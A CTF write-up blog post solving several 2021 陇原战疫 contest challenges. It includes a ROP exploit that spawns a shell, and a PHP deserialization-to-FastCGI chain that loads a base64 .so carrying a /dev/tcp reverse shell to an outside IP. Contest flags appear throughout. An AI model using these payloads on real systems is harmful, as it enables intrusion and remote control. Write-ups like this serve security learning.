陇原战“疫“2021网络安全大赛部分WP

最新推荐文章于 2022-07-02 19:16:40 发布
最新推荐文章于 2022-07-02 19:16:40 发布
阅读量2.1k 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/justruofeng/article/details/122135465
版权

陇原战"疫"2021网络安全大赛WP

公众号:Th0r安全

文章目录

CRYPTO

  • mostlycommon

写脚本

from gmpy2 import *
from Crypto.Util.number import *

n=122031686138696619599914690767764286094562842112088225311503826014006886039069083192974599712685027825111684852235230039182216245029714786480541087105081895339251403738703369399551593882931896392500832061070414483233029067117410952499655482160104027730462740497347212752269589526267504100262707367020244613503
c1=39449016403735405892343507200740098477581039605979603484774347714381635211925585924812727991400278031892391996192354880233130336052873275920425836986816735715003772614138146640312241166362203750473990403841789871473337067450727600486330723461100602952736232306602481565348834811292749547240619400084712149673
c2=43941404835820273964142098782061043522125350280729366116311943171108689108114444447295511969090107129530187119024651382804933594308335681000311125969011096172605146903018110328309963467134604392943061014968838406604211996322468276744714063735786505249416708394394169324315945145477883438003569372460172268277

e1 = 65536
e2 = 270270
g=gcd(e1,e2)
print(g)
_,s,t=gcdext(e1,e2)

M=pow(c1,s,n)*pow(c2,t,n)%n

for k in range(1000000):

    a=iroot(M+k*n,g)

    if a[1]:

        print(long_to_bytes(a[0]))

        break

在这里插入图片描述

运行得到SETCTF{now_you_master_common_mode_attack}

MISC

  • soEasyCheckin

玩附件中的mc打掉末影龙之后给了一张图片
在这里插入图片描述
发现一串密文:11F9sACbBBBWKTiClYDtNF2yIEfThXdfIGPxF,from base62解密得到flag
在这里插入图片描述
SETCTF{Fi9ht1ng_3ItH_V1rUs}

  • 打败病毒

下载附件发现base32,解码发现有两个乱码,去掉乱码,base3加密对比附件,发现不属于base32的两个字符0 , 将 ,将 换成S,数字从2~7依次尝试,发现是5,然后base32解密
在这里插入图片描述
接着base16解码发现核心价值观编码
在这里插入图片描述
核心价值观解码
在这里插入图片描述
SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4}

PWN

  • bbbaby

利用功能0把栈溢出检测函数修改为main,这样用1去溢出的时候就还是会回到main,然后泄露libc,最后利用功能0把atoi函数got改为system,getshellexp

#!/usr/bin/env python
#coding=utf-8
from pwn import*
r = process('./qm')
elf = ELF('./qm')
libc = ELF('/lib/x86_64-linux-gnu/ libc.so.6')
context(log_level='debug',os='linux',arch='amd64')
def chocie(c):
r.recvuntil("choice")
r.sendline(str(c))

def add(size,content):
chocie(1)
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.send(content)

def edit(addr,content):
chocie(0)
r.recvuntil(":")
r.sendline(addr)
r.recvuntil(":")
r.send(content)

pop_rdi_ret = 0x400a03
pop_rsi_r15_ret = 0x400a01
main = 0x40090B
payload = p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main)
edit(str(0x601020),p64(0x40090B))
yichu(0x200,'A'*0x110 + p64(0) + payload)
chocie(5)
chocie(5)
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.sym['puts']
system = libc_base + libc.sym['system']
edit(str(0x601040),p64(system))
r.sendline(b'/bin/sh\x00')
r.interactive()

flag{fe64f4d6-bd04-4bb7-87e5-479efd3b86a5}

  • REVERSE

下载附件,IDA打开,找了半天发现,直接shift+F12,找字符串,最像MD5的就是
在这里插入图片描述
fc5e038d38a57032085441e7fe7010b0

  • findme

异或下就行

a = [0xB7, 0x52, 0x85, 0xC1, 0x90, 0xE9, 0x07, 0xB8, 0xE4, 0x1A, 0xC3, 0xBD, 0x1D, 0x8E, 0x85, 0x46, 0x00, 0x21, 0x44,
     0xAF, 0xEF, 0x70, 0x32, 0xB5, 0x11, 0xC6]
b = [0xE4 ,0x17, 0XD1,0x82,0xC4, 0xAF, 0x7C, 0xEC, 0X8C,0x2B, 0xB0, 0xE2, 0x74, 0xBB, 0xDA,
  0x03, 0x32, 0x7E, 0x71, 0xDB, 0xBD, 0x13, 0x5F, 0x8C, 0x30,  0xBB]
for i in range(len(a)):
    print(chr((a[i]^b[i])&0xff),end="")

SETCTF{Th1s_i5_E2_5tRcm9!}

  • power

发现关键字,aes 算法
在这里插入图片描述
发现有密文和key
在这里插入图片描述
直接解密即可

from Crypto.Cipher import AES
from Crypto.Util.number import *

key=b'this_is_a_key!!!'
cipher=long_to_bytes(0x1030a9254d44937bed312da03d2db9adbec5762c2eca7b5853e489d2a140427b)
aes=AES.new(key,AES.MODE_ECB)
text=aes.decrypt(cipher)
print(text)

在这里插入图片描述
flag{y0u_found_the_aes_12113112}

WEB

  • eaaasyphp

反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下:

class Bypass {
    public function __construct(){
        $this->str4 = "phpinfo";
        $this->feng = new Esle();
    }

/*    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            //throw new Error("Error");
        }
    }*/
}
echo urlencode(serialize(new Bypass()));

发现有fastcgi,再联想到利用的这里:

file_put_contents($this->filename, $this->data);

很容易想到利用ftp被动模式打fastcgi了。
流程按蓝帽杯那题来就行了,不细锁了。先把恶意类的so打过去,把它写在/tmp/feng.so

import base64

import requests

payload="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DhCGAkMNBk4MBwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAGAAAAAAAAAAAAAAAAAADgBQAAAAAAAAEA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AAAAAAAAAAAAAACTAQAAEgAJAAAFAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc2OTgAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AGhhY2suYwBfX0ZSQU1FX0VORF9fAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUNfRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBfZWRhdGEAX2ZpbmkAc3lzdGVtQEBHTElCQ18yLjIuNQBfX2dtb25fc3RhcnRfXwBfZW5kAF9fYnNzX3N0YXJ0AHByZWxvYWQAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4yLjUAX2luaXQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALm5vdGUuZ251LmJ1aWxkLWlkAC5nbnUuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWxhLmR5bgAucmVsYS5wbHQALmluaXQALnBsdC5nb3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAABwAAAAIAAAAAAAAAyAEAAAAAAADIAQAAAAAAACQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAALgAAAPb//28CAAAAAAAAAPABAAAAAAAA8AEAAAAAAAA8AAAAAAAAAAMAAAAAAAAACAAAAAAAAAAAAAAAAAAAADgAAAALAAAAAgAAAAAAAAAwAgAAAAAAADACAAAAAAAAIAEAAAAAAAAEAAAAAQAAAAgAAAAAAAAAGAAAAAAAAABAAAAAAwAAAAIAAAAAAAAAUAMAAAAAAABQAwAAAAAAAJ4AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAASAAAAP///28CAAAAAAAAAO4DAAAAAAAA7gMAAAAAAAAYAAAAAAAAAAMAAAAAAAAAAgAAAAAAAAACAAAAAAAAAFUAAAD+//9vAgAAAAAAAAAIBAAAAAAAAAgEAAAAAAAAIAAAAAAAAAAEAAAAAQAAAAgAAAAAAAAAAAAAAAAAAABkAAAABAAAAAIAAAAAAAAAKAQAAAAAAAAoBAAAAAAAAMAAAAAAAAAAAwAAAAAAAAAIAAAAAAAAABgAAAAAAAAAbgAAAAQAAABCAAAAAAAAAOgEAAAAAAAA6AQAAAAAAAAYAAAAAAAAAAMAAAAVAAAACAAAAAAAAAAYAAAAAAAAAHgAAAABAAAABgAAAAAAAAAABQAAAAAAAAAFAAAAAAAAFwAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABzAAAAAQAAAAYAAAAAAAAAIAUAAAAAAAAgBQAAAAAAACAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAfgAAAAEAAAAGAAAAAAAAAEAFAAAAAAAAQAUAAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAIcAAAABAAAABgAAAAAAAABQBQAAAAAAAFAFAAAAAAAA7QAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAACNAAAAAQAAAAYAAAAAAAAAQAYAAAAAAABABgAAAAAAAAkAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAkwAAAAEAAAACAAAAAAAAAFAGAAAAAAAAUAYAAAAAAAA3AAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAJsAAAABAAAAAgAAAAAAAACIBgAAAAAAAIgGAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACpAAAAAQAAAAIAAAAAAAAAsAYAAAAAAACwBgAAAAAAAHwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAswAAAA4AAAADAAAAAAAAAAgOIAAAAAAACA4AAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAL8AAAAPAAAAAwAAAAAAAAAYDiAAAAAAABgOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADLAAAABgAAAAMAAAAAAAAAIA4gAAAAAAAgDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAAOAPIAAAAAAA4A8AAAAAAAAgAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANQAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADdAAAAAQAAAAMAAAAAAAAAIBAgAAAAAAAgEAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA4wAAAAgAAAADAAAAAAAAACgQIAAAAAAAKBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAOgAAAABAAAAMAAAAAAAAAAAAAAAAAAAACgQAAAAAAAAKQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAABYEAAAAAAAAPgEAAAAAAAAGgAAACoAAAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAUBUAAAAAAACZAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADAAAAAAAAAAAAAAAAAAAAAAAAAOkWAAAAAAAA8QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA="

url="http://cf41a4b5-d2b7-490f-93c5-5b32adf39563.node4.buuoj.cn:81/"

params = {
    "code":'O:6:"Bypass":2:{s:4:"str4";O:7:"Welcome":1:{s:8:"username";O:5:"Bunny":1:{s:8:"filename";s:12:"/tmp/feng.so";}}s:4:"feng";O:4:"Esle":0:{}}'
}
data={
    "data":base64.b64decode(payload)
}
r=requests.post(url=url,params=params,data=data)

ftp那边起,nc起,然后payload打过去就行了:

<?php

class Check {
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {

    public function __wakeup(){
        $this->hint = "no hint";
    }

    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }
    }
}


class Bunny {
    public function __construct(){
        $this->filename="ftp://121.5.169.223:39444/1";
        $this->data = urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%9C%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%16SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Fuser.php%0B%09SCRIPT_NAME%2Fuser.php%0B%09REQUEST_URI%2Fuser.php%0F%29PHP_ADMIN_VALUEextension_dir+%3D+%2Ftmp%0Aextension+%3D+feng.so%0A%0F%11SERVER_SOFTWAREphp%2Ffastcgiclient%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9985%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0C%21CONTENT_TYPEapplication%2Fx-www-form-urlencoded%0E%01CONTENT_LENGTH0%01%04%00%01%00%00%00%00%01%05%00%01%00%00%00%00");
    }

    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {
    public function __construct(){
        $this->username = new Bunny();
    }
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {
    public function __construct(){
        $this->str4 = new Welcome();
        $this->feng = new Esle();
    }

/*    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            //throw new Error("Error");
        }
    }*/
}
echo urlencode(serialize(new Bypass()));

http://cf41a4b5-d2b7-490f-93c5-5b32adf39563.node4.buuoj.cn:81/?code=O%3A6%3A%22Bypass%22%3A2%3A%7Bs%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A27%3A%22ftp%3A%2F%2F121.5.169.223%3A39444%2F1%22%3Bs%3A4%3A%22data%22%3Bs%3A452%3A%22%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%9C%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%16SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Fuser.php%0B%09SCRIPT_NAME%2Fuser.php%0B%09REQUEST_URI%2Fuser.php%0F%29PHP_ADMIN_VALUEextension_dir+%3D+%2Ftmp%0Aextension+%3D+feng.so%0A%0F%11SERVER_SOFTWAREphp%2Ffastcgiclient%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9985%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0C%21CONTENT_TYPEapplication%2Fx-www-form-urlencoded%0E%01CONTENT_LENGTH0%01%04%00%01%00%00%00%00%01%05%00%01%00%00%00%00%22%3B%7D%7Ds%3A4%3A%22feng%22%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7D%7D

root@VM-0-6-ubuntu:~# nc -lvvp 39876
Listening on [0.0.0.0] (family 0, port 39876)
Connection from 117.21.200.166 64381 received!
